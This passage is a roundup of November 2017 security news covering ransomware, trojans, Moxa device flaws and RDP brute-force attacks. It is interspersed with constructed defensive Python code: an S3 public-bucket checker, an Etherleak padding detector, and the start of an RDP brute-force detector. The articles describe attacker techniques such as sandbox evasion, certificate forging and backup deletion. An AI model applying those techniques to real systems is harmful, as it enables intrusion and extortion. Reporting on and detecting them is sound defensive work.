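def _principals(stmt):
    """Flatten the Principal element of a policy statement into a set of strings."""
    principal = stmt.get("Principal", {})
    if isinstance(principal, str):
        return {principal}
    values = set()
    for v in principal.values():
        values.update([v] if isinstance(v, str) else v)
    return values


def public_policy_statements(policy):
    """Sids of Allow statements that grant anonymous access with no Condition.
    Simplification: any Condition is treated as restricting access."""
    hits = []
    for idx, stmt in enumerate(policy.get("Statement", [])):
        if stmt.get("Effect") != "Allow" or stmt.get("Condition"):
            continue
        if _principals(stmt) & ANONYMOUS_PRINCIPALS:
            hits.append(stmt.get("Sid", f"Statement[{idx}]"))
    return hits


def public_acl_grants(acl):
    """(permission, group) pairs in a bucket ACL that grant access to everyone."""
    grants = []
    for grant in acl.get("Grants", []):
        uri = grant.get("Grantee", {}).get("URI")
        if uri in PUBLIC_ACL_GROUPS:
            grants.append((grant.get("Permission"), uri.rsplit("/", 1)[-1]))
    return grants


def public_access_block_complete(cfg):
    """True only when all four S3 Block Public Access switches are on."""
    keys = ("BlockPublicAcls", "IgnorePublicAcls", "BlockPublicPolicy", "RestrictPublicBuckets")
    return all(cfg.get(k) is True for k in keys)


def assess_bucket(name, policy, acl, public_access_block):
    """Combine the three checks into one verdict with human-readable reasons."""
    reasons = [f"policy statement {sid} allows anonymous access"
               for sid in public_policy_statements(policy)]
    reasons += [f"ACL grants {perm} to {group}" for perm, group in public_acl_grants(acl)]
    if not public_access_block_complete(public_access_block):
        reasons.append("Block Public Access is not fully enabled")
    return {"bucket": name, "public": bool(reasons), "reasons": reasons}


# Constructed configurations: placeholder bucket name, account id and role, not real resources.
WEAK_POLICY = {
    "Version": "2012-10-17",
    "Statement": [{
        "Sid": "PublicRead", "Effect": "Allow", "Principal": "*",
        "Action": ["s3:GetObject", "s3:ListBucket"],
        "Resource": ["arn:aws:s3:::example-archive", "arn:aws:s3:::example-archive/*"],
    }],
}
WEAK_ACL = {"Grants": [{"Grantee": {"Type": "Group",
                                    "URI": "http://acs.amazonaws.com/groups/global/AllUsers"},
                        "Permission": "READ"}]}
WEAK_PAB = {"BlockPublicAcls": False, "IgnorePublicAcls": False,
            "BlockPublicPolicy": False, "RestrictPublicBuckets": False}

HARDENED_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Sid": "AnalystRoleOnly", "Effect": "Allow",
         "Principal": {"AWS": "arn:aws:iam::111122223333:role/ArchiveAnalyst"},
         "Action": ["s3:GetObject", "s3:ListBucket"],
         "Resource": ["arn:aws:s3:::example-archive", "arn:aws:s3:::example-archive/*"]},
        # A Deny for everyone is fine: it only removes access over plaintext transport.
        {"Sid": "DenyInsecureTransport", "Effect": "Deny", "Principal": "*",
         "Action": "s3:*", "Resource": "arn:aws:s3:::example-archive/*",
         "Condition": {"Bool": {"aws:SecureTransport": "false"}}},
    ],
}
HARDENED_ACL = {"Grants": [{"Grantee": {"Type": "CanonicalUser", "ID": "OWNER-ID-PLACEHOLDER"},
                            "Permission": "FULL_CONTROL"}]}
HARDENED_PAB = {"BlockPublicAcls": True, "IgnorePublicAcls": True,
                "BlockPublicPolicy": True, "RestrictPublicBuckets": True}

if __name__ == "__main__":
    print(json.dumps(assess_bucket("example-archive", WEAK_POLICY, WEAK_ACL, WEAK_PAB), indent=2))
    print(json.dumps(assess_bucket("example-archive", HARDENED_POLICY, HARDENED_ACL, HARDENED_PAB), indent=2))
```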

City of Spring Hill in Tennessee still hasn’t recovered from ransomware attack
18.11.2017 securityaffairs

In early November, the City of Spring Hill, Tenn., suffered a ransomware attack, and it still hasn’t recovered from the attack.
In early November, the City of Spring Hill, Tenn, suffered a ransomware attack, but government officials refused to pay a $250,000 ransom demanded by the crooks and attempted to restore the database recovering the content from backups.

The malware caused serious damage to the city and many ordinary activities were affected: city workers were not able to access their email accounts, and residents were not able to make online payments or even use payment cards to pay utility bills or court fines, or conduct any other business transaction.

The situation is worse for emergency responders: emergency dispatchers have had to log the calls by writing them by hand on a dry-erase board.

“This keeps track of our active police officers and medics out on a call,” said Director Brandi Smith about the white board.

“We write it down on paper, take the call number, put it behind them, so no matter who is working they know where the officer is, because despite all this, officer safety is still important to us,” she told News 2.


According to WKRN, the ransomware attack has shut down all mobile data terminals in the city’s police cars.

City officials announced that the 911 system and city emails have been restored since Tuesday; the situation is more complicated for restoring direct deposits and online payments.

Investigators believe that the crooks haven’t stolen information from the city’s server.

GitHub warns developers when their projects include vulnerable libraries
18.11.2017 securityaffairs

The code hosting service GitHub warns developers when they include certain flawed software libraries in their projects and suggests fixes to solve the issues.
The code hosting service warns developers when including certain flawed software libraries in their projects and provides advice on how to address the issue.

GitHub has recently introduced the Dependency Graph, a feature that lists all the libraries used by a project. The new feature supports JavaScript and Ruby, and the company also plans to add the support for Python next year.


The new security feature is designed to alert developers when one of their project’s dependencies has known flaws. The Dependency graph and the security alerts feature have been automatically enabled for public repositories, but they are opt-in for private repositories.

The availability of a dependency graph allows GitHub to notify the owners of projects when it detects a known security vulnerability in one of the dependencies and to suggest known fixes from the GitHub community.

“Today, for the over 75 percent of GitHub projects that have dependencies, we’re helping you do more than see those important projects. With your dependency graph enabled, we’ll now notify you when we detect a vulnerability in one of your dependencies and suggest known fixes from the GitHub community.” states GitHub on the introduction of the security alerts.

GitHub provides developers the type of flaw, the associated severity, and affected versions, the user interface includes a link that points to a page where additional details are available.

Administrators can also choose the form of warnings, including email alerts, web notifications, and warnings via the user interface, selecting also the final recipient of the message (individuals or groups).

The code hosting service tracks flaws in both Ruby gems and NPM packages that appear on MITRE’s Common Vulnerabilities and Exposures (CVE) list in order to determine if a project is using flawed libraries.

“Vulnerabilities that have CVE IDs (publicly disclosed vulnerabilities from the National Vulnerability Database) will be included in security alerts. However, not all vulnerabilities have CVE IDs—even many publicly disclosed vulnerabilities don’t have them.” continues GitHub.

“This is the next step in using the world’s largest collection of open source data to help you keep code safer and do your best work. The dependency graph and security alerts currently support Javascript and Ruby—with Python support coming in 2018.”

Since many publicly disclosed vulnerabilities don’t have CVEs, GitHub will also try to warn users of flaws that still haven’t received a CVE identifier.

“We’ll continue to get better at identifying vulnerabilities as our security data grows,” GitHub added.

In the presence of a security patch for a vulnerability discovered by GitHub, the service advises the developers to update or adopt a fix provided by the community.

EMOTET Trojan Variant Evades Malware Analysis
18.11.2017 securityweek
A recently observed variant of the EMOTET banking Trojan features new routines that allow it to evade sandbox and malware analysis, Trend Micro security researchers say.

Also known as Geodo, EMOTET is a piece of malware related to the Dridex and Feodo (Cridex, Bugat) families. Mainly used to steal banking credentials and other sensitive information, EMOTET can also be used as a Trojan downloader, and recent attacks have dropped various malicious payloads.

In a report published in early November, Microsoft revealed that EMOTET has been increasingly targeting business users.

According to Trend Micro, EMOTET’s dropper changed from using RunPE to exploiting a Windows application programming interface (API) called CreateTimerQueueTimer. The API creates a queue for lightweight objects called timers, which are meant to enable the selection of a callback function at a specified time.

“The original function of the API is to be part of the process chain by creating a timer routine, but here, the callback function of the API becomes EMOTET’s actual payload. EMOTET seems to have traded RunPE for a Windows API because the exploitation of the former has become popular while the latter is lesser known, theoretically making it more difficult to detect by security scanners,” Trend Micro explains.

EMOTET, however, is not the first malware family to abuse this Windows API, as the Hancitor banking Trojan that also dropped PONY and VAWTRAK used it in its dropper (a malicious macro document) as well.

The new Trojan variant also features an anti-analysis technique that involves checking when the scanner monitors activities in order to dodge detection. With the use of said Windows API, the malware can do the job every 0x3E8 milliseconds, the security researchers say.

At the second stage of the payload, the new Trojan variant can check if it runs inside a sandbox environment and terminates its process if it does. The dropper checks the NetBIOS’ name, the UserName, and for the presence of specific files on the system.

The malware also runs itself through another process if it does not have admin privilege. If it does have said privileges, it creates an auto start service for persistence, renames it and starts it, collects system information, encrypts it, and sends it via a POST request to the command and control (C&C) server.

In a recent analysis of the EMOTET C&C infrastructure, security researcher MalwareTech (Marcus Hutchins) notes that the threat is using hardcoded IP addresses to connect to the server. However, it uses compromised sites as proxies for the C&C connection.

This practice, the researcher says, has become increasingly popular “because it adds a layer of protection preventing researchers from easily finding and shutting down the actual C2 server.” It also makes it difficult to flag the servers as malicious, given that they are legitimate websites that have been running for years.

The new EMOTET variant is distributed via phishing emails containing a malicious URL meant to drop a macro-enabled document. Best practices for defending against phishing attacks should keep both enterprises and end-users safe from the threat, Trend Micro notes.

GitHub Warns Developers When Using Vulnerable Libraries
18.11.2017 securityweek
Code hosting service GitHub now warns developers if certain software libraries used by their projects contain any known vulnerabilities and provides advice on how to address the issue.

GitHub recently introduced the Dependency Graph, a feature in the Insights section that lists the libraries used by a project. The feature currently supports JavaScript and Ruby, and the company plans on adding support for Python next year.

The new security feature added by GitHub is designed to alert developers when one of their project’s dependencies has known flaws. The Dependency Graph and the security alerts feature have been automatically enabled for public repositories, but they are opt-in for private repositories.

When a vulnerable library is detected, a “Known security vulnerability” alert will be displayed next to it in the Dependency Graph. Administrators can also configure email alerts, web notifications, and warnings via the user interface, and they can add the teams or individuals who should see the alerts.

GitHub identifies vulnerable projects by tracking flaws in Ruby gems and NPM packages on MITRE’s Common Vulnerabilities and Exposures (CVE) list. When a new flaw is added, the company identifies all repositories that use the affected version and informs their owners.

The information provided to administrators includes the type of flaw, its severity, and affected versions. There is also a link that points to a page where additional details are available.

If a patch exists for the vulnerability, GitHub advises developers to update or uses machine learning to suggest a fix provided by the community.

GitHub currently tracks vulnerabilities that have been assigned a CVE identifier, but since many publicly disclosed flaws don’t have CVEs, the company will also try to warn users of issues that don’t have one. “We'll continue to get better at identifying vulnerabilities as our security data grows,” GitHub said.

Group Launches Secure DNS Service Powered by IBM Threat Intelligence
18.11.2017 securityweek Safety
A newly announced free Domain Name System (DNS) service promises automated immunity from known Internet threats by blocking access to websites flagged as malicious.

Called Quad9, after the IP address of its primary DNS server, the new service was launched by IBM Security, Packet Clearing House (PCH) and the Global Cyber Alliance (GCA) and aims to provide increased security and privacy online to consumers and businesses alike.

The Quad9 service was designed to keep users safe from millions of malicious Internet sites that have already been flagged for stealing personal information, infecting users with ransomware and other types of malware, or conducting fraudulent activity.

The service routes users’ DNS queries through a secure network of servers and uses threat intelligence from over a dozen cyber security companies to provide real-time perspective on whether the websites are safe or not. The users’ browsers are automatically blocked from accessing a website that the system has detected as being infected.

Quad9 harvests intelligence from IBM X-Force’s threat database and also taps feeds from 18 additional partners, including Abuse.ch, the Anti-Phishing Working Group, Bambenek Consulting, F-Secure, mnemonic, 360Netlab, Hybrid Analysis GmbH, Proofpoint, RiskIQ, and ThreatSTOP.

The service was designed to protect traditional PCs and laptops, along with Internet connected TVs, DVRs, and Internet of Things (IoT) products such as smart thermostats and connected home appliances. Many of these devices do not receive important security updates and are difficult to secure although they remain connected to the Internet, which leaves them vulnerable to hackers.

Performance should not be affected when using the new DNS service, IBM says. At launch, Quad9 has points of presence in over 70 locations across 40 countries, leveraging PCH’s expertise and global assets. The service’s points of presence should double over the next 18 months, in an attempt to improve speed, performance, privacy, and security.

Quad9 says it does not store, correlate or otherwise leverage personally identifiable information (PII) from its users. To take advantage of the new DNS service’s benefits, users only need to configure their devices to use Quad9 as their DNS server.

“Setting up DNS filtering requires just a simple configuration change. Most organizations or home users can update in minutes by changing the DNS settings in the central DHCP server which will update all clients in a few minutes with no action needed at end devices at all. The service is and will remain freely available to anyone wishing to use it,” Quad9’s website reads.

Quad9 started as the brainchild of GCA, but each of the involved partners is responsible for a different aspect of the service. GCA offers system development capabilities, PCH is responsible for Quad9’s network infrastructure, while IBM provides X-Force threat intelligence and the service’s IP address.

Other services providing similar (free) offerings include Cisco-owned OpenDNS and Google’s Public DNS.

“Protecting against attacks by blocking them through DNS has been available for a long time, but has not been used widely. Sophisticated corporations can subscribe to dozens of threat feeds and block them through DNS, or pay a commercial provider for the service. However, small to medium-sized businesses and consumers have been left behind – they lack the resources, are not aware of what can be done with DNS, or are concerned about exposing their privacy and confidential information,” said Philip Reitinger, President and CEO of the Global Cyber Alliance.

While the service looks promising, it remains to be seen how it will perform when compared to already established offerings, Lenny Zeltser, Vice President of Products at Minerva Labs, an Israel-based provider of endpoint security solutions, told SecurityWeek in an emailed comment.

“Based on the iniquitous DNS protocol, Quad9 promises to secure network activities in a non-intrusive manner and in a manner that’s easy to deploy. That’s wonderful. Though I’m encouraged by these aspects of the offering, I am curious how it compares to the well-established Cisco Umbrella (formerly OpenDNS) service, which has been around for a while and earned trust among end-users and IT practitioners. Similarly, Google DNS servers provide some network security benefits to their users,” Zeltser said.

Joseph Carson, chief security scientist at Thycotic, a Washington D.C. based provider of privileged account management (PAM) solutions, told SecurityWeek that the new service’s focus on privacy is more than welcomed. Privacy as we know it is disappearing fast, with everyone being watched and monitored 24/7 when in public places, in an attempt to improve security and deliver tailored experiences, he says.

“The new DNS service from Quad9, with a focus on both privacy and security, is a step in the right direction. It is a must needed level of protection in today’s world of cyber threats and helps put the balance back in the consumers. While many governments and ISP’s are removing the ability for citizens to surf the internet with privacy and confidence in security, Quad9 has stepped in to bring a bit of balance back. It will help bring some peace of mind to many who want to surf the internet without being continuously targeted and limit personal information flowing through the internet without their knowledge,” Carson said.

“It is also important to note that what Quad9 is providing is not 100% security. Therefore, you must continue to be cautious when using the internet and always question any suspicious links or advertisements displayed. This will not stop you from getting phishing emails or social media threats so it is always important to take additional steps. Continue to do best practices when purchasing anything online and manage your credentials and passwords securely,” he concluded.

Banking Trojan Gains Ability to Steal Facebook, Twitter and Gmail Accounts
17.11.2017 thehackernews

Security researchers have discovered a new, sophisticated form of malware based on the notorious Zeus banking Trojan that steals more than just bank account details.
Dubbed Terdot, the banking Trojan has been around since mid-2016 and was initially designed to operate as a proxy to conduct man-in-the-middle (MitM) attacks, steal browsing information such as stored credit card information and login credentials, and inject HTML code into visited web pages.
However, researchers at security firm Bitdefender have discovered that the banking Trojan has now been revamped with new espionage capabilities such as leveraging open-source tools for spoofing SSL certificates in order to gain access to social media and email accounts and even post on behalf of the infected user.
The Terdot banking Trojan does this by using a highly customized man-in-the-middle (MitM) proxy that allows the malware to intercept any traffic on an infected computer.
Besides this, the new variant of Terdot has even added automatic update capabilities that allow the malware to download and execute files as requested by its operator.
Previously, Terdot targeted the banking websites of numerous Canadian institutions, such as Royal Bank, Banque Nationale, PCFinancial, Desjardins, BMO (Bank of Montreal) and Scotiabank, among others.
This Trojan Can Steal Your Facebook, Twitter and Gmail accounts
However, according to the latest analysis, Terdot can target social media networks including Facebook, Twitter, Google Plus, and YouTube, and email service providers including Google's Gmail, Microsoft's live.com, and Yahoo Mail.
Interestingly, the malware avoids gathering data related to Russia's largest social media platform, VKontakte (vk.com), Bitdefender noted. This suggests Eastern European actors may be behind the new variant.
The banking Trojan is mostly being distributed through websites compromised with the SunDown Exploit Kit, but researchers also observed it arriving in a malicious email with a fake PDF icon button.
If clicked, it executes obfuscated JavaScript code that downloads and runs the malware file. In order to evade detection, the Trojan uses a complex chain of droppers, injections, and downloaders that allow the download of Terdot in pieces.
Once a system is infected, the Trojan injects itself into the browser process to direct connections through its own web proxy, read traffic and inject spyware. It can also steal authentication information by inspecting the victim's requests or injecting spyware JavaScript code into the responses.
Terdot can also bypass restrictions imposed by TLS (Transport Layer Security) by generating its own Certificate Authority (CA) and generating certificates for every domain the victim visits.
Any data that victims send to a bank or social media account could then be intercepted and modified by Terdot in real-time, which could also allow it to spread itself by posting fake links to other social media accounts.
"Terdot is a complex malware, building upon the legacy of Zeus," Bitdefender concluded. "Its focus on harvesting credentials for other services such as social networks and email services could turn it into an extremely powerful cyber espionage tool that is extremely difficult to spot and clean."
Bitdefender has been tracking the new variant of Terdot banking Trojan ever since it resurfaced in October last year. For more details on the new threat, you can head on to a technical paper (PDF) published by the security firm.

Kaspersky: NSA Worker's Computer Was Already Infected With Malware

17.11.2017 thehackernews BigBrothers

Refuting allegations that its anti-virus product helped Russian spies steal classified files from an NSA employee's laptop, Kaspersky Lab has released more findings that suggest the computer in question may have been infected with malware.
Moscow-based cyber security firm Kaspersky Lab on Thursday published the results of its own internal investigation claiming the NSA worker who took classified documents home had a personal home computer overwhelmed with malware.
According to the latest Kaspersky report, the telemetry data its antivirus collected from the NSA staffer's home computer contained large amounts of malware files which acted as a backdoor to the PC.
The report also provided more details about the malicious backdoor that infected the NSA worker's computer when he installed a pirated version of Microsoft Office 2013 .ISO containing the Mokes backdoor, also known as Smoke Loader.
Backdoor On NSA Worker's PC May Have Helped Other Hackers Steal Classified Documents
This backdoor could have allowed other hackers to steal classified documents and hacking tools belonging to the NSA from the machine of the employee, who worked for the Tailored Access Operations (TAO) group of hackers at the agency.
For those unaware, the United States has banned Kaspersky antivirus software from all of its government computers over suspicion of Kaspersky's involvement with Russian intelligence agencies and fears of spying.
Though no substantial evidence is yet available, an article published by the US news outlet the Wall Street Journal (WSJ) last month claimed that Kaspersky Antivirus helped Russian government hackers steal highly classified documents and hacking tools belonging to the NSA in 2015 from a staffer's home PC.
However, the article, which quoted multiple anonymous sources, failed to provide any solid evidence of whether Kaspersky was intentionally involved with the Russian spies or whether hackers simply exploited a zero-day bug in the antivirus product.
Kaspersky stands by its claim that its antivirus software detected and collected the NSA classified files as part of its normal functionality, and has rigorously denied allegations that it passed those documents on to the Russian government.
The recent report published by the anti-virus firm says that between September 11, 2014, and November 17, 2014, Kaspersky Lab servers received confidential NSA materials multiple times from a poorly secured computer located in the United States.
The company's antivirus software, which was installed on the employee's PC, discovered that the files contained malware used by Equation Group, the NSA's elite hacking group, active for some 14 years, that Kaspersky exposed in 2015.
Kaspersky Claims it Deleted All NSA Classified Files
Besides confidential material, the software also collected 121 separate malware samples (including a backdoor) which were not related to the Equation Group.
The report also insists that the company deleted all classified documents once one of its analysts realized that the antivirus had collected more than malicious binaries. Also, the company then created a special software tweak, preventing those files from being downloaded again.
"The reason we deleted those files and will delete similar ones in the future is two-fold; we do not need anything other than malware binaries to improve protection of our customers and secondly, because of concerns regarding the handling of potential classified materials," Kaspersky Lab report reads.
"Assuming that the markings were real, such information cannot and will not [be] consumed even to produce detection signatures based on descriptions."
Trojan Discovered on NSA Worker's Computer
The backdoor discovered on the NSA staffer's PC was actually a Trojan, which was later identified as "Smoke Bot" or "Smoke Loader" and allegedly created by a Russian criminal hacker in 2011. It had also been advertised on Russian underground forums.
Interestingly, this Trojan communicated with the command and control servers apparently set up by a Chinese individual going by the name "Zhou Lou," using the e-mail address "zhoulu823@gmail.com."
Since executing the malware would not have been possible with the Kaspersky antivirus enabled, the staffer must have disabled the antivirus software to do so.
"Given that system owner's potential clearance level, the user could have been a prime target of nation states," the Kaspersky report reads.
"Adding the user's apparent need for cracked versions of Windows and Office, poor security practices, and improper handling of what appeared to be classified materials, it is possible that the user could have leaked information to many hands."
More details on the backdoor can be found here.
For now, the Kaspersky anti-virus software has been banned by the U.S. Department of Homeland Security (DHS) from all of its government computers.
In the wake of this incident, Kaspersky Lab has recently launched a new transparency initiative that involves giving partners access to its antivirus source code and paying large bug bounties for security issues discovered in its products.

New Cyber Insurance Firm Unites Insurance With Cyber Intelligence
17.11.2017 securityweek Cyber
Mountain View, Calif-based cyber insurance firm At-Bay has emerged from stealth with a mission to shake up the status quo in cyber insurance. It brings a new model of security cooperation between insured and insurer to reduce risk and exposure to both parties.

At-Bay has partnered with HSB to bring to market a product to insure and defend organizations against cyber risks. It has closed a $6 million seed funding round, led by LightSpeed Venture Partners, with the participation of Shlomo Kramer and LocalGlobe.

"We founded At-Bay with the belief that controlling for cyber risk enables businesses to embrace technology and unlock great value to customers," said Rotem Iram, CEO and founder, At-Bay. "We match deep insights on a company's IT security with financial exposure that cyber attack vectors create, to enable insurance brokers and risk managers to more clearly and accurately assess and manage cyber risk. Our insurance products and supporting risk management services provide organizations with the confidence that they can take on the challenges of tomorrow."

Organizations are increasingly digitizing their businesses and becoming more reliant on technology. Technology is not secure and presents risk. Much of that risk is mitigated by security technology -- but each day there is further proof that security technology is not perfect. Risk managers need to consider that despite all the security technology employed to mitigate risk, there will always be residual risk that is best handled by risk transfer; that is, cyber insurance. Cyber insurance can be seen as a complement to cybersecurity technology used together to more fully mitigate the increasing risk of insecure digitization.

The primary problem for cyber insurers is that there is no established historical corpus of understanding for cybersecurity risk in the same way as there is for, say, motor or life insurance. Insurance works best with static risk, but cyber risk is intrinsically dynamic -- both the target (the IT infrastructure) and the attack methodology (attackers, tools, techniques, exploits and motivation) are continuously changing. Neither the insurer nor the insured currently understands how cybersecurity can be insured. For example, a survey by At-Bay indicates that 50% of companies that do not have cyber insurance say it is because they do not know enough about cyber insurance.

At-Bay proposes to solve this dilemma by uniting cybersecurity understanding with cyber insurance delivery within one supplier. At-Bay's Rotem Iram points out that insurers have two advantages in this process. Firstly, they are on the hook to pay out in case of loss; and secondly, as they develop their customer base, they become privy to a vast amount of information on cybersecurity and risk. The first provides the incentive for insurers to learn from the second, provided they have sufficient in-house understanding of cybersecurity threats, mitigations and response.

One of the problems for insurers is that each client's risk profile is continuously and unpredictably changing. "A rate could be set for a perceived risk; but two months later the NSA loses EternalBlue and the risk level changes," explains Iram. "The insurer cannot increase the premiums because it's not the insured's fault -- so he has to carry that increased risk at the same premium for another ten months. But if the insurer has sufficient understanding of the security posture of the client, he can tell the client about the new risk and how to mitigate it."

The interesting part about this example is that Iram would still pay out on the insurance even if he warned a company about a new risk and the company did nothing about it -- and was subsequently affected. "Yes, 100%," he told SecurityWeek. He accepts that he may be being a little naive, but firmly believes the future for cyber insurance is the evolution of a mutually collaborative relationship between insurer and insured. If the insurer gives good advice, and the insured responds, the insurer could give an end-of-year rebate.

Key to that collaboration is that the insured must trust the cybersecurity knowledge of the cybersecurity insurer. This is what has been lacking and is precisely what At-Bay seeks to bring to the table. Iram himself comes from a security background, and even spent five years with the Israel Defence Forces where he became head of the techno-intelligence group. He believes that if the insurer can demonstrate that it gives good advice, the insured will respond. "Nobody wants to get hacked. There's always a cost. There will always be some aspects that aren't or cannot be covered by insurance." Insurance is about reducing financial exposure as far as possible, not about eliminating it -- it cannot, for example, insure against loss of revenue caused by brand reputation damage (think Target), or loss of share value (think Equifax).

"We will be collecting data and using researchers to push the limits of our understanding of risk," he told SecurityWeek. "As we do that, we will be improving the quality of our product. Product quality is depressed today because insurance companies do not really understand the cybersecurity risk.

"Our team," he continued, "is split between Mountain View and Tel Aviv. Tel Aviv is where we have access to incredible security talent from the intelligence community. What we've built is a nation-state level reconnaissance capability based on what we've brought from the intelligence community. Our team and machine gathers intelligence from different sources, contextualizes it, and relates it to the customer infrastructure. Long story short, we scan the entire market of publicly available resources every month. Whenever we underwrite a company we have a history of how their technology stack and their security stack has looked and evolved over a period of time. This is a good part of the underwriting process, and helps us offer really good security advice to our clients."

The Equifax breach is an example of how this model would work. Rather than sit back and wait for the breach that would trigger an insurance claim, At-Bay would detect and inform any client with an unpatched vulnerability (such as the Struts vulnerability at Equifax) and explain how it should be remediated.

If At-Bay succeeds in its model of uniting security intelligence with insurance, it could shake up the entire cyber insurance market. If it does that, then both cybersecurity vendors and technology companies will need to look at their existing own third-party liability insurance. If more companies adopt cyber insurance, then more cybersecurity insurers will start trying to claw back their payouts from third parties who may be deemed to have been at fault in the breach.

Moxa NPort Devices Vulnerable to Remote Attacks
17.11.2017 securityweek
Hundreds of Moxa Devices Similar to Ones Targeted in Ukraine Power Grid Hack Vulnerable to Remote Attacks

Firmware updates released by Moxa for some of its NPort serial device servers patch several high severity vulnerabilities that can be exploited remotely. These types of devices were targeted in the 2015 attack on Ukraine’s energy sector.

According to an advisory published by ICS-CERT, the flaws affect NPort 5110 versions 2.2, 2.4, 2.6 and 2.7, NPort 5130 version 3.7 and prior, and NPort 5150 version 3.7 and prior. The security holes have been patched with the release of version 2.9 for NPort 5110 and version 3.8 for NPort 5130 and 5150.

ICS-CERT said one of the vulnerabilities, CVE-2017-16719, allows an attacker to inject packets and disrupt the availability of the device. Another flaw, CVE-2017-16715, is related to the handling of Ethernet frame padding and it could lead to information disclosure, while the last issue, CVE-2017-14028, can be leveraged to cause memory exhaustion by sending a large amount of TCP SYN packets.

Florian Adamsky, the researcher credited by ICS-CERT for finding the flaws, told SecurityWeek that the vulnerabilities were found as part of a bigger research project conducted by him and Dr. Thomas Engel of the University of Luxembourg’s SECAN-Lab.

The research focuses on industrial Serial-to-Ethernet converters, which are often used in critical infrastructure, including power plants, water treatment facilities, and chemical plants. Adamsky pointed out that in the 2015 attack on Ukraine’s power grid, which caused significant blackouts, the hackers targeted these types of devices in an effort to make them inoperable. A detailed research paper describing the vulnerabilities will be published at some point in the future.

The researcher said all of the Moxa device vulnerabilities can be exploited remotely over the Internet. A scan with the Censys search engine revealed more than 2,000 Moxa devices connected to the Web, including over 1,350 NPort systems affected by the discovered flaws.

Adamsky said the CVE-2017-16719 vulnerability exists due to the fact that the TCP Initial Sequence Number (ISN) from NPort 5110 and 5130 devices is predictable. This allows an attacker to create and inject malicious network packets into an established TCP connection by predicting the ISN.

According to the researcher, the ISN was based on uptime, which can be easily obtained via the Simple Network Management Protocol (SNMP). Exploitation of this vulnerability could, in certain circumstances, lead to arbitrary command execution, the expert said.

Exploiting CVE-2017-16715 can allow an attacker to obtain previously sent network packets, which can include the session ID of an HTTP connection. This ID can be leveraged by an attacker to gain access to a device’s web interface.

“In CVE-2017-16715, we found out that these devices were using uninitialized memory as padding for network packets,” Adamsky explained. “According to RFC 894, the minimum Ethernet frame size is 46 bytes. If a packet is smaller than the minimum size, the IP packet ‘should be padded (with octet of zero) to meet the Ethernet minimum frame size’. Instead of octets of zeros, Moxa used uninitialized memory. This vulnerability was called Etherleak in the past.”
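As an added illustration (not code from the researchers or from Moxa), the following Python check inspects captured Ethernet frames for the condition Adamsky describes: an IPv4 packet shorter than the 46-byte minimum whose padding octets are not all zero. The frame contents, MAC and IP addresses are constructed samples.

```python
import struct

ETH_HDR_LEN = 14          # dst MAC (6) + src MAC (6) + EtherType (2)
MIN_ETH_PAYLOAD = 46      # minimum Ethernet data field per RFC 894
ETHERTYPE_IPV4 = 0x0800


def trailing_padding(frame: bytes) -> bytes:
    """Return the bytes that follow the IPv4 packet inside an Ethernet frame.

    For a packet shorter than MIN_ETH_PAYLOAD these are the padding octets, which
    RFC 894 says should be zero. Assumes the capture has no FCS appended.
    """
    if len(frame) < ETH_HDR_LEN + 20:           # no room for an IPv4 header
        return b""
    ethertype = struct.unpack("!H", frame[12:14])[0]
    if ethertype != ETHERTYPE_IPV4:
        return b""
    payload = frame[ETH_HDR_LEN:]
    ip_total_len = struct.unpack("!H", payload[2:4])[0]
    if ip_total_len < 20 or ip_total_len > len(payload):
        return b""                               # malformed or truncated capture
    return payload[ip_total_len:]


def is_etherleak(frame: bytes) -> bool:
    """True if the padding contains any non-zero byte (possible memory leak)."""
    return any(trailing_padding(frame))


def scan_frames(frames):
    """Return (index, padding) for every frame whose padding is not all zeros."""
    return [(i, trailing_padding(f)) for i, f in enumerate(frames) if is_etherleak(f)]


def build_frame(padding: bytes) -> bytes:
    """Constructed sample: a 28-byte IPv4/ICMP echo request plus the given padding,
    i.e. what a capture of a minimum-size frame from the device looks like."""
    eth = bytes.fromhex("001122334455") + bytes.fromhex("66778899aabb") + b"\x08\x00"
    icmp = struct.pack("!BBHHH", 8, 0, 0, 1, 1)          # echo request, checksum omitted
    ip_total_len = 20 + len(icmp)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, ip_total_len, 0x1234, 0, 64, 1, 0,
                     bytes([192, 0, 2, 10]), bytes([192, 0, 2, 20]))
    return eth + ip + icmp + padding


if __name__ == "__main__":
    # Constructed captures: one padded correctly, one padded with stale buffer contents.
    samples = [build_frame(b"\x00" * 18), build_frame(b"Cookie: session=ab")]
    for index, pad in scan_frames(samples):
        print(f"frame {index}: non-zero padding {pad!r}")
```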

The security holes were reported to Moxa via ICS-CERT in June and August, and they were patched by the vendor on November 14.

Ransomware Targets SMBs via RDP Attacks
17.11.2017 securityweek
A series of ransomware attacks against small-to-medium companies are leveraging Remote Desktop Protocol (RDP) access to infect systems, Sophos reports.

As part of these attacks, the malicious actors abuse an issue commonly found in many business networks: weak passwords. After managing to crack an RDP password, attackers can easily install their malware on the company’s systems in the hope of collecting a ransom payment.

Discovering RDP ports exposed to the Internet isn’t difficult at all, Sophos explains. Cybercriminals can use specialized search engines such as Shodan for that and then abuse public or private tools to gain access to the discovered systems.

As part of the analyzed attacks, the actors used a tool called NLBrute to brute-force their way into the discovered systems by trying a variety of RDP passwords. Once they managed to find the right password, the attackers would immediately log into the network and create their own administrative accounts, Sophos says.

By doing so attackers can reconnect to the network even if the admin password they used for initial compromise has been changed. “They’ve already got backup accounts they can use to sneak back in later,” the researchers say.

Next, the attackers download and install low-level system tweaking software, such as Process Hacker, after which they turn off or reconfigure anti-malware applications. They also attempt to elevate privileges by abusing known vulnerabilities, including the CVE-2017-0213 and CVE-2016-0099 flaws, which Microsoft patched long ago.

The attackers also turn off database services to allow their malware to target databases, and also turn off the Windows live backup service called Volume Shadow Copy and delete existing backups, to prevent victims from restoring targeted files without paying. Next, they upload and run their ransomware.
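The chain Sophos describes (many failed RDP logons from one address, then a successful one, then a new local account) is visible in Windows Security event data. The following is an added detection example, not Sophos's own tooling; the event lines, account names and addresses are constructed samples in a simplified field format, and the failure threshold and time window are assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of Security log events, reduced to the fields the detection
# needs: timestamp, event ID, logon type (10 = RemoteInteractive/RDP), account, source.
SAMPLE_EVENTS = """\
2017-11-14T03:12:01 4625 type=10 user=administrator src=203.0.113.7
2017-11-14T03:12:04 4625 type=10 user=administrator src=203.0.113.7
2017-11-14T03:12:07 4625 type=10 user=admin src=203.0.113.7
2017-11-14T03:12:10 4625 type=10 user=administrator src=203.0.113.7
2017-11-14T03:12:13 4625 type=10 user=administrator src=203.0.113.7
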